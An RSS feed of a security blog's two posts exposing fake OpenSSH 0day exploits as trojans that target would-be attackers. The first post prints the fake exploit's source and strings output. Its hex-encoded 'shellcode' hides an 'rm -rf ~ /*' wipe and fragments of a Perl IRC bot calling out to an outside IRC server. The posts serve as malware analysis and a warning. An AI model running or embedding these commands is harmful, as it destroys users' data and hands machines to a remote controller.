<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Xanda's Blog !~! &#187; openssh</title>
	<atom:link href="http://blog.xanda.org/tag/openssh/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.xanda.org</link>
	<description>Human Knowledge Belongs To The World.</description>
	<lastBuildDate>Tue, 13 Jul 2010 10:10:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Yet Another Fake Exploit</title>
		<link>http://blog.xanda.org/2010/02/07/yet-another-fake-exploit/</link>
		<comments>http://blog.xanda.org/2010/02/07/yet-another-fake-exploit/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 12:43:49 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[fake]]></category>
		<category><![CDATA[openssh]]></category>
		<category><![CDATA[script kiddies]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1052</guid>
		<description><![CDATA[PenTestIT is listed in my RSS list and just now, i&#8217;ve got a feed from PenTestIT with the title &#8220;openssh-53p1-remote-root.c&#8221;
Hurm.. what a surprise news, but.. I think I&#8217;m too old for this.. lets see..

xanda:tmp adnan$ cd /tmp
&#160;
xanda:tmp adnan$ mkdir lame
&#160;
xanda:tmp adnan$ cd lame/
&#160;
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28--  http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com &#40;pentestit.com&#41;... 208.87.241.96
Connecting to pentestit.com &#40;pentestit.com&#41;&#124;208.87.241.96&#124;:80... [...]]]></description>
			<content:encoded><![CDATA[<p>PenTestIT is listed in my RSS list and just now, i&#8217;ve got a feed from PenTestIT with the title &#8220;openssh-53p1-remote-root.c&#8221;</p>
<p>Hurm.. what a surprise news, but.. I think I&#8217;m too old for this.. lets see..</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">xanda:tmp adnan$ <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp
&nbsp;
xanda:tmp adnan$ <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #c20cb9; font-weight: bold;">lame</span>
&nbsp;
xanda:tmp adnan$ <span style="color: #7a0874; font-weight: bold;">cd</span> lame<span style="color: #000000; font-weight: bold;">/</span>
&nbsp;
xanda:<span style="color: #c20cb9; font-weight: bold;">lame</span> adnan$ <span style="color: #c20cb9; font-weight: bold;">wget</span> http:<span style="color: #000000; font-weight: bold;">//</span>pentestit.com<span style="color: #000000; font-weight: bold;">/</span>wp-content<span style="color: #000000; font-weight: bold;">/</span>uploads<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2010</span><span style="color: #000000; font-weight: bold;">/</span>02<span style="color: #000000; font-weight: bold;">/</span>openssh-53p1-remote-root.c
<span style="color: #660033;">--<span style="color: #000000;">2010</span>-02-07</span> <span style="color: #000000;">20</span>:<span style="color: #000000;">41</span>:<span style="color: #000000;">28</span>--  http:<span style="color: #000000; font-weight: bold;">//</span>pentestit.com<span style="color: #000000; font-weight: bold;">/</span>wp-content<span style="color: #000000; font-weight: bold;">/</span>uploads<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2010</span><span style="color: #000000; font-weight: bold;">/</span>02<span style="color: #000000; font-weight: bold;">/</span>openssh-53p1-remote-root.c
Resolving pentestit.com <span style="color: #7a0874; font-weight: bold;">&#40;</span>pentestit.com<span style="color: #7a0874; font-weight: bold;">&#41;</span>... 208.87.241.96
Connecting to pentestit.com <span style="color: #7a0874; font-weight: bold;">&#40;</span>pentestit.com<span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #000000; font-weight: bold;">|</span>208.87.241.96<span style="color: #000000; font-weight: bold;">|</span>:80... connected.
HTTP request sent, awaiting response... <span style="color: #000000;">200</span> OK
Length: <span style="color: #000000;">13273</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>13K<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>text<span style="color: #000000; font-weight: bold;">/</span>x-c<span style="color: #7a0874; font-weight: bold;">&#93;</span>
Saving to: <span style="color: #000000; font-weight: bold;">`</span>openssh-53p1-remote-root.c<span style="color: #ff0000;">'
&nbsp;
100%[=========================================================================================================================================&gt;] 13,273      7.82K/s   in 1.7s    
&nbsp;
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c'</span> saved <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">13273</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">13273</span><span style="color: #7a0874; font-weight: bold;">&#93;</span>
&nbsp;
xanda:<span style="color: #c20cb9; font-weight: bold;">lame</span> adnan$ <span style="color: #c20cb9; font-weight: bold;">more</span> openssh-53p1-remote-root.c 
&nbsp;
<span style="color: #000000; font-weight: bold;">/*</span> openssh-53p1-remote-root.c
<span style="color: #000000; font-weight: bold;">*</span> OpenSSH <span style="color: #000000; font-weight: bold;">&lt;</span>= 5.3p1-<span style="color: #000000;">1</span> Remote Root Exploit by the<span style="color: #000000; font-weight: bold;">|</span>one
<span style="color: #000000; font-weight: bold;">*</span> Email: root<span style="color: #000000; font-weight: bold;">@</span>chamillionaire.com
<span style="color: #000000; font-weight: bold;">*</span> Release <span style="color: #c20cb9; font-weight: bold;">date</span>: Unreleased <span style="color: #7a0874; font-weight: bold;">&#40;</span>private<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">/</span> <span style="color: #000000;">2010</span>
<span style="color: #000000; font-weight: bold;">*</span> Available Patch: No fix-patch has been issued or reported.
<span style="color: #000000; font-weight: bold;">*</span>
<span style="color: #000000; font-weight: bold;">*</span> <span style="color: #660033;">-----------------</span>
<span style="color: #000000; font-weight: bold;">*</span> Additional Notes:
<span style="color: #000000; font-weight: bold;">*</span> <span style="color: #660033;">-----------------</span>
<span style="color: #000000; font-weight: bold;">*</span> By using this software, you take any and<span style="color: #000000; font-weight: bold;">/</span>or all responsibility
<span style="color: #000000; font-weight: bold;">*</span> <span style="color: #000000; font-weight: bold;">for</span> the damage<span style="color: #7a0874; font-weight: bold;">&#40;</span>s<span style="color: #7a0874; font-weight: bold;">&#41;</span> caused and will not bitch to me, the<span style="color: #000000; font-weight: bold;">|</span>one, about it.
<span style="color: #000000; font-weight: bold;">*</span>
<span style="color: #000000; font-weight: bold;">*</span> USE THIS SOFTWARE AT YOUR OWN DISCRETION<span style="color: #000000; font-weight: bold;">!</span> Later skiddies. :<span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">*/</span>
<span style="color: #666666; font-style: italic;">#include &lt;stdio.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;stdlib.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;string.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;stdarg.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;sys/types.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;sys/socket.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;netinet/in.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;arpa/inet.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;unistd.h&gt;</span>
<span style="color: #666666; font-style: italic;">#include &lt;netdb.h&gt;</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#define VALID_RANGE 0xb44ffe00</span>
<span style="color: #666666; font-style: italic;">#define build_frem(x,y,a,b,c) a##c##a##x##y##b</span>
&nbsp;
char jmpcode<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> =
    <span style="color: #ff0000;">&quot;\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f&quot;</span>
    <span style="color: #ff0000;">&quot;\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26&quot;</span>;
&nbsp;
char shellcode<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> =
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65&quot;</span>
        <span style="color: #ff0000;">&quot;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&quot;</span>
        <span style="color: #ff0000;">&quot;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&quot;</span>
        <span style="color: #ff0000;">&quot;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&quot;</span>
        <span style="color: #ff0000;">&quot;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&quot;</span>
        <span style="color: #ff0000;">&quot;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&quot;</span>
        <span style="color: #ff0000;">&quot;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&quot;</span>
        <span style="color: #ff0000;">&quot;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&quot;</span>
        <span style="color: #ff0000;">&quot;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&quot;</span>
        <span style="color: #ff0000;">&quot;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&quot;</span>
        <span style="color: #ff0000;">&quot;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&quot;</span>
        <span style="color: #ff0000;">&quot;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&quot;</span>
        <span style="color: #ff0000;">&quot;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&quot;</span>
        <span style="color: #ff0000;">&quot;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&quot;</span>
        <span style="color: #ff0000;">&quot;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&quot;</span>
        <span style="color: #ff0000;">&quot;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
        <span style="color: #ff0000;">&quot;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&quot;</span>
        <span style="color: #ff0000;">&quot;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&quot;</span>
        <span style="color: #ff0000;">&quot;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&quot;</span>
        <span style="color: #ff0000;">&quot;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&quot;</span>
        <span style="color: #ff0000;">&quot;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&quot;</span>
        <span style="color: #ff0000;">&quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&quot;</span>
&nbsp;
xanda:<span style="color: #c20cb9; font-weight: bold;">lame</span> adnan$ <span style="color: #c20cb9; font-weight: bold;">gcc</span> openssh-53p1-remote-root.c <span style="color: #660033;">-o</span> fake
&nbsp;
xanda:<span style="color: #c20cb9; font-weight: bold;">lame</span> adnan$ <span style="color: #c20cb9; font-weight: bold;">strings</span> fake <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">more</span>
&nbsp;
the<span style="color: #000000; font-weight: bold;">|</span>one is rooting your Linux<span style="color: #000000; font-weight: bold;">/</span>FreeBSD Network
  Usage: <span style="color: #000000; font-weight: bold;">%</span>s <span style="color: #660033;">-h</span> <span style="color: #000000; font-weight: bold;">&lt;</span>host<span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #660033;">-p</span> port
  Options:
<span style="color: #660033;">-h</span> ip<span style="color: #000000; font-weight: bold;">/</span>host of target
<span style="color: #660033;">-p</span> port
<span style="color: #660033;">-d</span> username
<span style="color: #660033;">-B</span> memory_limit <span style="color: #000000;">8</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">16</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">64</span>
Root is required <span style="color: #000000; font-weight: bold;">for</span> raw sockets, etc.
  <span style="color: #7a0874; font-weight: bold;">&#91;</span>+<span style="color: #7a0874; font-weight: bold;">&#93;</span> the<span style="color: #000000; font-weight: bold;">|</span>one<span style="color: #ff0000;">'s OpenSSH Remote Root Exploit - 2010
  [-] Resolving Failed
  [-] Connecting Failed
Getting root isn'</span>t that hard, skiddie
<span style="color: #007800;">PS1</span>=<span style="color: #ff0000;">'sh-3.2#'</span> <span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span><span style="color: #c20cb9; font-weight: bold;">sh</span>
  <span style="color: #7a0874; font-weight: bold;">&#91;</span>-<span style="color: #7a0874; font-weight: bold;">&#93;</span> Failed to exploit the target :
<span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-rf</span> ~ <span style="color: #000000; font-weight: bold;">/*</span> <span style="color: #000000;">2</span><span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>dev<span style="color: #000000; font-weight: bold;">/</span>null <span style="color: #000000; font-weight: bold;">&amp;</span>
<span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
<span style="color: #007800;">$chan</span>=<span style="color: #ff0000;">&quot;#cn&quot;</span>;
<span style="color: #007800;">$ke</span><span style="color: #ff0000;">&quot;;
while (&lt;<span style="color: #007800;">$sockG</span> (.*)$/){print &quot;</span>;
<span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">&lt;</span><span style="color: #007800;">$sockn</span><span style="color: #ff0000;">&quot;;
            sleep 1;
       k<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>;<span style="color: #7a0874; font-weight: bold;">&#125;</span><span style="color: #7a0874; font-weight: bold;">&#125;</span>print <span style="color: #007800;">$sock</span> <span style="color: #ff0000;">&quot;JOIN <span style="color: #007800;">$chan</span> <span style="color: #007800;">$key</span><span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>;<span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">&lt;</span><span style="color: #007800;">$sock</span><span style="color: #000000; font-weight: bold;">&gt;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #7a0874; font-weight: bold;">&#123;</span><span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">/</span>^PING <span style="color: #7a0874; font-weight: bold;">&#40;</span>.<span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>$<span style="color: #000000; font-weight: bold;">/</span><span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #7a0874; font-weight: bold;">&#123;</span>print <span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
<span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
            <span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
<span style="color: #007800;">$chan</span>=<span style="color: #ff0000;">&quot;#cn&quot;</span>;<span style="color: #007800;">$key</span> =<span style="color: #ff0000;">&quot;fags&quot;</span>;<span style="color: #007800;">$nick</span>=<span style="color: #ff0000;">&quot;phpfr&quot;</span>;<span style="color: #007800;">$server</span>=<span style="color: #ff0000;">&quot;G (.*)$/){print &quot;</span>;
<span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">&lt;</span><span style="color: #007800;">$sockn</span><span style="color: #ff0000;">&quot;;
            sleep 1;
       k<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>;<span style="color: #7a0874; font-weight: bold;">&#125;</span><span style="color: #7a0874; font-weight: bold;">&#125;</span>print <span style="color: #007800;">$sock</span> <span style="color: #ff0000;">&quot;JOIN <span style="color: #007800;">$chan</span> <span style="color: #007800;">$key</span><span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>;<span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">&lt;</span><span style="color: #007800;">$sock</span><span style="color: #000000; font-weight: bold;">&gt;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #7a0874; font-weight: bold;">&#123;</span><span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">/</span>^PING <span style="color: #7a0874; font-weight: bold;">&#40;</span>.<span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>$<span style="color: #000000; font-weight: bold;">/</span><span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #7a0874; font-weight: bold;">&#123;</span>print <span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
<span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span></pre></div></div>

<p>knock knock knock&#8230; script kiddies.. grow up!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/07/yet-another-fake-exploit/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>OpenSSH </title>
		<link>http://blog.xanda.org/2009/07/19/openssh/</link>
		<comments>http://blog.xanda.org/2009/07/19/openssh/#comments</comments>
		<pubDate>Sun, 19 Jul 2009 12:50:56 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[oday]]></category>
		<category><![CDATA[openssh]]></category>
		<category><![CDATA[script kiddies]]></category>
		<category><![CDATA[shellcode]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=851</guid>
		<description><![CDATA[I&#8217;m writing this entry by refering to &#8216;the exploit&#8217; released for OpenSSH 0day as mentioned in THIS post.
Lets take a look at the exploit:

And now convert the payload into binary. Personally, I use Shellcode to EXE

And finally, view the content of the payload  

Now sit for a while, grab a Pepsi and think&#8230; what [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m writing this entry by refering to &#8216;the exploit&#8217; released for OpenSSH 0day as mentioned in <strong><a href="http://blog.xanda.org/?p=822" target="_blank">THIS</a></strong> post.</p>
<p>Lets take a look at the exploit:</p>
<p style="text-align: center;"><img src="http://img.xanda.org/galleries/fake-ssh-0day-1-0.png" alt="" /></p>
<p style="text-align: left;">And now convert the payload into binary. Personally, I use <a href="http://sandsprite.com/shellcode_2_exe.php" target="_blank">Shellcode to EXE</a></p>
<p style="text-align: center;"><img src="http://img.xanda.org/galleries/fake-ssh-0day-2.png" alt="" /></p>
<p style="text-align: left;">And finally, view the content of the payload <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: center;"><img src="http://img.xanda.org/galleries/fake-ssh-0day-3.png" alt="" /></p>
<p style="text-align: left;">Now sit for a while, grab a Pepsi and think&#8230; what is going to happen if you simply download, compile and run it?</p>
<p style="text-align: left;">Moral of the story, &#8220;everyone might start with script kiddies, but it doesn&#8217;t mean you have to be a script kiddies forever&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2009/07/19/openssh/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
